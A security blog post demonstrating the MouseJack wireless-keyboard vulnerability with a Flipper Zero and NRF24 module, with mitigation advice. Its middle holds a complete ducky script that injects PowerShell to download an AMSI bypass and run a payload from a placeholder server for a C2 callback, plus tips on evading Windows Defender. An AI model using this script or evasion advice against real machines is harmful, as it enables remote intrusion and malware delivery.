Mousejacking With A Flipper Zero
In this blog post, we will discuss the wireless attack called mousejacking and how to protect yourself from it. We will specifically focus on using a Flipper Zero device to test and later explain how to defend against mousejacking attacks.
What’s mousejacking?
MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice. This attack was announced by Bastille in 2016. These peripherals are ‘connected’ to a host computer using a radio transceiver, commonly a small USB dongle. Since the connection is wireless, and mouse movements and keystrokes are sent over the air, it is possible to compromise a victim’s computer by transmitting specially-crafted radio signals using a device which costs as little as $15 or a different one that costs up to $40.
An attacker can launch the attack from up to 100 meters away. The attacker is able to take control of the target computer, without physically being in front of it, and type arbitrary text or send scripted commands. It is therefore possible to perform malicious activities without being detected.
The MouseJack exploit centers around injecting unencrypted keystrokes into a target computer. Mouse movements are usually sent unencrypted, and keystrokes are often encrypted (to prevent eavesdropping what is being typed). However, the MouseJack vulnerability takes advantage of affected receiver dongles and their associated software allowing unencrypted keystrokes transmitted by an attacker to be passed on to the computer’s operating system as if the victim had legitimately typed them.
Technical overview
Wireless mice and keyboards commonly communicate using proprietary protocols operating in the 2.4GHz ISM band. In contrast to Bluetooth, there is no industry standard to follow leaving each vendor to implement their own security scheme.
Wireless mice and keyboards work by transmitting radio frequency packets to a USB dongle plugged into a user’s computer. When a user presses a key on their keyboard or moves their mouse, information describing the actions are sent wirelessly to the USB dongle.
The dongle listens for radio frequency packets sent by the mouse or keyboard, and notifies the computer whenever the user moves their mouse or types on their keyboard.
In order to prevent eavesdropping, most vendors encrypt the data being transmitted by wireless keyboards. The dongle knows the encryption key being used by the keyboard, so it is able to decrypt the data and see what key was pressed. Without knowing the encryption key, an attacker is unable to decrypt the data, so they are unable to see what is being typed.
Conversely, none of the mice that were tested by Bastille encrypt their wireless communications. This means that there is no authentication mechanism, and the dongle is unable to distinguish between packets transmitted by a mouse, and those transmitted by an attacker. As a result, an attacker is able to pretend to be a mouse and transmit their own movement/click packets to a dongle.
Anatomy of the attack
First, the attacker identifies a target wireless mouse or keyboard by listening for RF packets transmitted when a user is moving/clicking the mouse or typing on the keyboard.
Finally, the attacker transmits keypress packets to type a series of commands into the victim’s computer. This can include downloading a virus or rootkit, transferring files off of the victim’s computer, or anything else the attacker could do if they were physically typing on the computer’s keyboard.
Testing setup
The test setup was an updated Windows 11 laptop with a Logitech USB Unifying receiver, a Logitech M210 mouse and a Logitech K260 keyboard. To carry out the attack, a Flipper Zero with a Dr.B0rk NRF24 Flipper Zero v2 board with EByte NRF24 module and a high gain antenna connected via GPIO pins was used. The firmware used on the Flipper Zero was a fork of the unleashed firmware from DarkFlippers, because the necessary scripts for operating the NRF24 wireless module via the GPIO pins are readily available.
The whole setup looks like below with the Flipper Zero to the left with the NRF24 module installed, HP laptop connected to Havoc C2 and the Asus laptop to the middle (target) with the Logitech USB Unifying receiver, mouse and keyboard connected.
To begin the attack, we first have to sniff for RF packets transmitted when a user is moving/clicking the mouse or typing on the keyboard. We do this using the NRF24 Sniffer fap (flipper zero application) under Applications > GPIO > NRF24 Sniffer
Press enter and change settings to scan channels, switch between modes/channels using buttons. Once all this is set wait for the keystrokes or mouse movement and when a valid address is found it will be copied to the flipper for later mousejacking.
When a valid address is found you will see it as shown below;
We can now exit the Sniffer app and proceed to the NRF24 mouse jacker application [Applications > GPIO > NRF24 Mouse Jacker] to now attack the PC. The captured address will be seen in an addresses.txt file in the Mouse Jacker application.
The address that was captured is listed below and to attack it we need to browse to a ducky script.
To create a ducky script we can do so offline and copy it to the Flipper Zero. The ducky script I want to use will have an AMSI bypass and use Invoke-Assembly to load a malicious EXE and get a callback to our Havoc C2 instance.
REM Author: n0n5m1l3
REM Description: Bypass AMSI and Loads Assembly in Memory
REM Version: 1.0
REM Category: Execution
REM Target: All Windows
DELAY 500
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 2000
STRING IEX([Net.Webclient]::new().DownloadString('http://PAYLOAD-SERVER-IP/amsibypass.txt'));
ENTER
DELAY 2000
STRING IEX([Net.Webclient]::new().DownloadString('http://PAYLOAD-SERVER-IP/Invoke-LoadAssembly.md'));
ENTER
DELAY 2000
STRING Invoke-LoadAssembly -AssemblyUrl http://PAYLOAD-SERVER-IP/Payload.exe -Command ''
ENTER
DELAY 2000
GUI d
The above ducky script will need one to have a working AMSI bypass, rename Invoke-Assembly extension from .ps1 to .md and load the Assembly.
The Assembly or EXE file should be obfuscated so as not to alert Windows Defender and better yet if it can have process injection capabilities. My assembly didn’t have process injection but it bypassed Windows Defender.
Demo of attack in action
Items used
Flipper Zero – $169 – https://shop.flipperzero.one/ [BEWARE OF SCAMMY SITES PURPORTING TO BE SELLING THE FLIPPER ZERO]
Dr.B0rk NRF24 Flipper Zero v2 board with EByte NRF24 module and a high gain antenna – $34 – https://www.tindie.com/products/tehrabbitt/flipper-zero-drb0rk-nrf24-v2/
What is the risk of this attack?
From the above demo, we can see that it takes a couple of seconds to run the malicious commands and we get a callback to our C2 (Command & Control) instance.
Once an attacker gets this callback, they can remotely run more malicious commands and navigate through the organization if an AD network is setup. They can also download sensitive files, setup persistence and maintain access for long periods and clean up their mousejacking initial access method.
This attack can be done from up to 100m away and with the portability of the Flipper it poses a challenge identifying a potential attacker.
High risk areas include libraries, public cafes and shared co-working spaces.
Mitigation
There are two basic types of nRF24L chips used by keyboards, mice, and dongles: one-time-programmable, and flash memory. One-time-programmable devices cannot be updated once they leave the factory, but flash memory devices can.
For non-updateable devices, which represent the majority of those tested by Bastille’s researchers, there is no mechanism to secure a vulnerable device short of unplugging the USB dongle from the computer.
For devices with updated firmware available from the manufacturer, it is recommended to install the update before continuing to use the affected mouse or keyboard.
One can also use a wired keyboard or mouse if they’re as paranoid as I am.
Which devices are affected?
Most old USB receiver dongles are affected but the talented researchers at Bastille whose shoulders I stood on have indicated them here
References
https://www.bastille.net/research/vulnerabilities/mousejack/affected-devices
https://www.bastille.net/research/vulnerabilities/mousejack
https://www.bastille.net/research/vulnerabilities/mousejack/technical-details
https://github.com/RogueMaster/flipperzero-firmware-wPlugins/blob/420/documentation/NRF24.md
Donations
If this was helpful you can donate below so that I can buy a Hack-RF with a PortaPack
BTC: bc1qwnsyyr5ttg7ktfqcmxgfe3sjelhy79z3r6cp4j
ETH: 0xB927fa9E84bd8BA9b06A8615b600D1AFC13d4824
XMR: 46CGeEhuDnqciAvV6BgptGg1d8XeKSV5hMfoPR6z5vsj9H1wZmEjqyBR2QiQXusY8USsmYb1LchrQEsTvuuBUC9YCnAmbi3
0 Comments